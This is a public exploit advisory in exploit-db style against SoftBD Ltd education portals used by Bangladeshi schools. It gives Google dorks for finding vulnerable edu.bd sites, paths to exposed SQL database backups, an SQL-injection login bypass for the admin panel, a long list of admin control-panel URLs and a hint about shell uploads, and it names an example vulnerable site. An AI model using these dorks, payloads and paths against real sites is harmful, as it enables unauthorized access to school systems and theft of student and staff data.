#################################################################################################
# Exploit Title : Design & Developed by SoftBd Ltd. Bangladesh Education Portals Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : soft-bd.com ~ softbdltd.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : + CWE-264 - Permissions, Privileges, and Access Controls + CWE-592 - Authentication Bypass Issues
+ CWE-434 - Unrestricted Upload of File with Dangerous Type
#################################################################################################
# Description : Bangladesh’s leading custom software [ for Government and Education portals ] web application development company.
+ SoftBD Ltd | Best Website Design and Development Company in Bangladesh
# Google Dorks :
intext:DEVELOPED BY : SOFTBD Ltd. site:edu.bd
inurl:''Design & Developed by : SOFTBD Ltd.'' site:edu.bd
inurl:''/teachers_information.php site:edu.bd
inurl:''/student_information.php site:edu.bd
inurl:/holiday_calendar.php site:edu.bd
inurl:''/academic_calendar.php site:edu.bd
inurl:''/rules_regulation.php site:edu.bd
inurl:''/class_routine.php site:edu.bd
inurl:''/examination_routine.php site:edu.bd
inurl:''/3rd_&_4th_class_employee_information.php site:edu.bd
inurl:''/department.php?id=MDc= site:edu.bd
inurl:''/facilities.php?id=MQ== site:edu.bd
inurl:''/general_notice.php site:edu.bd
inurl:''/admission.php?id=MDc= site:edu.bd
inurl:''/teachers_information_archive.php site:edu.bd
inurl:''academic_calendar_view.php'' site:edu.bd
+ Database SQL Backup Download [ Navicat MySQL Data Transfer Juicy Informations here ] =>
TARGET/trust_college_db.sql
TARGET/school_system-current.sql
TARGET/school_system-last.sql
TARGET/school_system.sql
TARGET/school_system_fress.sql
# Administration Login Panel Path => TARGET/login_slide.php
# Exploit :
Admin Username : '=''or'
Admin Password : '=''or'
# Useable Admin Control Panel URL Links =>
/modules/dashboard/index.php
/modules/dashboard/school_profile.php
/modules/dashboard/calendar.php
/modules/dashboard/class_list.php
/modules/dashboard/session_list.php
/modules/dashboard/group_sms_excel_upload.php
/modules/system_module/index.php
/includes/components/sms_gateway_data_update.php
/modules/dashboard/school_social_network_link.php
/modules/dashboard/student_excel_upload.php
/modules/system_task/index.php
/modules/dashboard/teacher_excel_upload.php
/modules/dashboard/user_group.php
/modules/dashboard/user_group_role.php
/modules/accounts/tution.php
/modules/accounts/teacher_salary_add.php
/modules/accounts/keyword_setup.php
/modules/accounts/fee_setup.php
/modules/accounts/account_template.php
/modules/accounts/expenditure_add.php
/modules/accounts/due_payment_list.php
/modules/users/user_add_new.php
/modules/users/user_list.php
/modules/student/list.php
/modules/student/add_form_simple.php
/modules/student/student_promotion.php
/modules/student/student_list_report.php
/modules/student/lecture_sheet_download.php
/modules/student/advising_student.php
/modules/school_setup/basic.php
/modules/school_setup/class.php
/modules/school_setup/sms_template.php
/modules/school_setup/subject.php
/modules/school_setup/designation.php
/modules/school_setup/teacher_sarary_template.php
/modules/school_setup/class_routine.php
/modules/school_setup/period_setup.php
/modules/school_setup/school_sms_bill_payment.php
/modules/teacher/list.php
/modules/teacher/index.php
/modules/attendance/daily.php
/modules/teacher/schedule_rpt.php
/modules/teacher/lecture_sheet_upload.php
/modules/exam/exam_setup.php
/modules/exam/add_mark_list.php
/modules/exam/edit_mark_list.php
/modules/exam/exam_setup_edit_list.php
/modules/notice/sms_group_template.php
/modules/dashboard/user_group_role.php
/modules/report/student_fee_report.php
/modules/report/student_due_fee_report.php
/modules/report/teacher_salary_report.php
/modules/report/expenditure_report.php
/modules/report/income_report.php
/modules/report/account_statement_report.php
/modules/report/attendance_report.php
/modules/report/exam_report.php
/modules/report/student_exam_mark_report.php
/modules/report/std_exam_mark_rpt.php
/modules/report/sms_report.php
/modules/report/teacher_list_report.php
/modules/report/hostel_room_allocation.php
/modules/report/exam_attendance_sheet_list.php
/modules/report/exam_seat_planing_print_list.php
/modules/website/general_notice_list.php
/modules/website/departmental_notice_list.php
/modules/website/college_facilities_list.php
/modules/website/event_list.php
/modules/website/admission_list.php
/modules/website/slider_list.php
Note : Some of the vulnerable sites, it can be upload shell.
#################################################################################################
# Example Vulnerable Site => uuc.edu.bd => [ Proof of Concept ] => archive.is/eGqUH
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################